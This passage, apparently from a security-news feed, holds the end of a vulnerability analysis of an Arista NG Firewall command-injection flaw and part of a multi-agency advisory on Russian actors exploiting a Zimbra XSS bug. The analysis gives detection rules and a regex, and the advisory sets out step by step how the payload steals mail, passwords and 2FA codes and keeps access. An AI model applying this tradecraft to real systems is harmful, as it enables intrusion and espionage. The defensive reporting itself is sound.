<p>The example above will write and execute a python script on the server to achieve code execution without using any restricted characters.</p>
<p>A remote, authenticated attacker could exploit this vulnerability by sending a JSON-RPC request to the <code>runTroubleshooting</code> method containing a crafted “HOST” or “URL” parameter containing shell metacharacters not present in the <code>runTroubleshooting()</code> check. Successful exploitation in the worst case will result in arbitrary command execution under the security context of the root user.</p>
<p><b data-preserve-html-node="true">Detection Guidance</b></p>
<p>To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following ports:<br>          -	HTTP, over port 80/TCP<br>          -	HTTPS, over port 443/TCP</p>
<p>Traffic to Arista NG Firewall may be encrypted and must be decrypted prior to applying this guidance. </p>
<p>The detection device must search for HTTP POST requests made to the request-URI <code>/admin/JSON-RPC</code>. If found, the body of the request must be parsed as JSON. The JSON object in the body must be inspected for a <code>method</code> key, and its value must be inspected to contain the substring <code>runTroubleshooting</code>. If found, the object must also be inspected for the JSON key "params", with a value containing a JSON array. The first entry in the JSON array must be inspected for any of the following strings:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If found, the second entry in the array must be inspected for a JSON object, and inspected for any of the following keys:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If either is found, the corresponding value to the key must be inspected for any of the following command injection characters:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If found, the traffic should be treated as suspicious; an attack exploiting this vulnerability is likely underway.</p>
<p>The following regular expression can be applied to find malicious requests:</p>
<p>          <code>/\x22(HOST|URL)\x22\s*:\s*\x22(?:[^\x22\\]|\\.)*?[\x60\x27\x24\x3c]/</code></p>
<p>Notes:</p>
<p>•	String matching on the request-URI and all JSON strings should be done in a case sensitive manner.<br>•	The JSON strings may be encoded and must be decoded prior to applying this guidance.<br>•	The request-URI may be URL-encoded and must be decoded before applying this guidance.</p>




  <p class=""><strong>Conclusion</strong></p><p class="">This vulnerability has been addressed by Arista with their <a href="https://www.arista.com/en/support/advisories-notices/security-advisory/22535-security-advisory-0123">Security Advisory 0123</a>. They note that the Arista Edge Threat Management - Arista Next Generation Firewall (Formerly Untangle) is affected by this bug, but other product versions are not. They also state the following mitigation can be applied:</p><p class=""><em>Do not allow non-authorized administrative access or access to the administrative browser.</em></p><p class="">However, the more appropriate action is to apply the provided vendor security patch by upgrading to version 17.4 or higher.</p><p class="">Special thanks to Jonathan Lein and Simon Humbert of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI  Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
<p>To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [<a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank">T1566</a>]. Through exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, this JavaScript payload is immediately executed once the user views the malicious email [<a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank">T1203</a>], such as the one shown in <a href="https://www.cisa.gov/#figure1"><strong>Figure 1</strong></a>, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [<a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank">T1199</a>], as shown in the email metadata in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK" width="604" height="235" alt="Figure 1: Example of malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 1: Example of malicious email</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx" width="604" height="102" alt="Figure 2: Headers from an example malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 2: Headers from an example malicious email</strong></em></figcaption>
  </figure>
<p>According to the National Vulnerability Database (NVD), <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376" target="_blank">CVE-2025-66376</a> was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [<a href="https://www.cisa.gov/#wc5">5</a>]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank">T1587.004</a>].  </p>
<p><strong>Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.</strong></p>
<p>Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank">T1027.017</a>], as shown in <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a>. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>) [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank">T1027.013</a>]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank">T1027.010</a>], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [<a href="https://attack.mitre.org/versions/v19/techniques/T1119/">T1119</a>]. The stages in order of appearance within the payload are as follows:</p>
<ol>
<li>sendStartPing,</li>
<li>gather_email,</li>
<li>gather_environment,</li>
<li>gather_2fa_codes,</li>
<li>gather_app_password,</li>
<li>gather_device_status,</li>
<li>gather_oauth_consumers,</li>
<li>gather_autocomplete_password,</li>
<li>enable_mail_protocols,</li>
<li>gather_gal,</li>
<li>sendArchives, and</li>
<li>sendFinishPing. </li>
</ol>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb" width="607" height="577" alt="Figure 3: Malicious payload of example email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 3: Malicious payload of example email</strong></em></figcaption>
  </figure>
<p>Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank">T1587</a>].</p>
<h3><em><strong>Persistence and credential access</strong></em><a class="ck-anchor"></a></h3>
<p>To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [<a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank">T1550.004</a>], and the Zimbra campaign follows a similar trend.</p>
<p>The script used in this campaign tries to discover the victim’s email address during the <em>gather_email</em> stage [<a href="https://attack.mitre.org/techniques/T1087/" target="_blank">T1087</a>]. The script searches for this email address in two ways. First, it examines the <em>batchInfoResponse </em>variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [<a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank">T1185</a>] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of <em>null </em>over HTTPS and does not attempt DNS exfiltration.</p>
<p>During the <em>gather_autocomplete_password</em> stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a>. If there is no value in that input field, it checks the password input field shown in <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of <em>null </em>is sent over HTTPS and DNS exfiltration is not attempted.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC" width="1024" height="188" alt="Figure 4: First illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 4: First illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa" width="1024" height="115" alt="Figure 5: Second illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 5: Second illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p>LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the <em>enable_mail_protocols</em> stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.</p>
<p>ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the <em>gather_app_password</em> stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank">T1556.006</a>]. The SOAP request uses “ZimbraWeb” as the name of the application.</p>
<p>Additionally, the script also attempts to collect 2FA tokens. During the <em>gather_2fa_codes</em> stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.</p>
<h3><em><strong>Collection</strong></em><a class="ck-anchor"></a></h3>
<p>As demonstrated in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, other SOAP commands executed to collect victim information are shown in <a href="https://www.cisa.gov/#table1"><strong>Table 1</strong></a>.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 1: Additional SOAP commands used</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>SOAP Command </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Namespace </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Stage </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraSync </p>
</div>
</div>
</td>
<td>
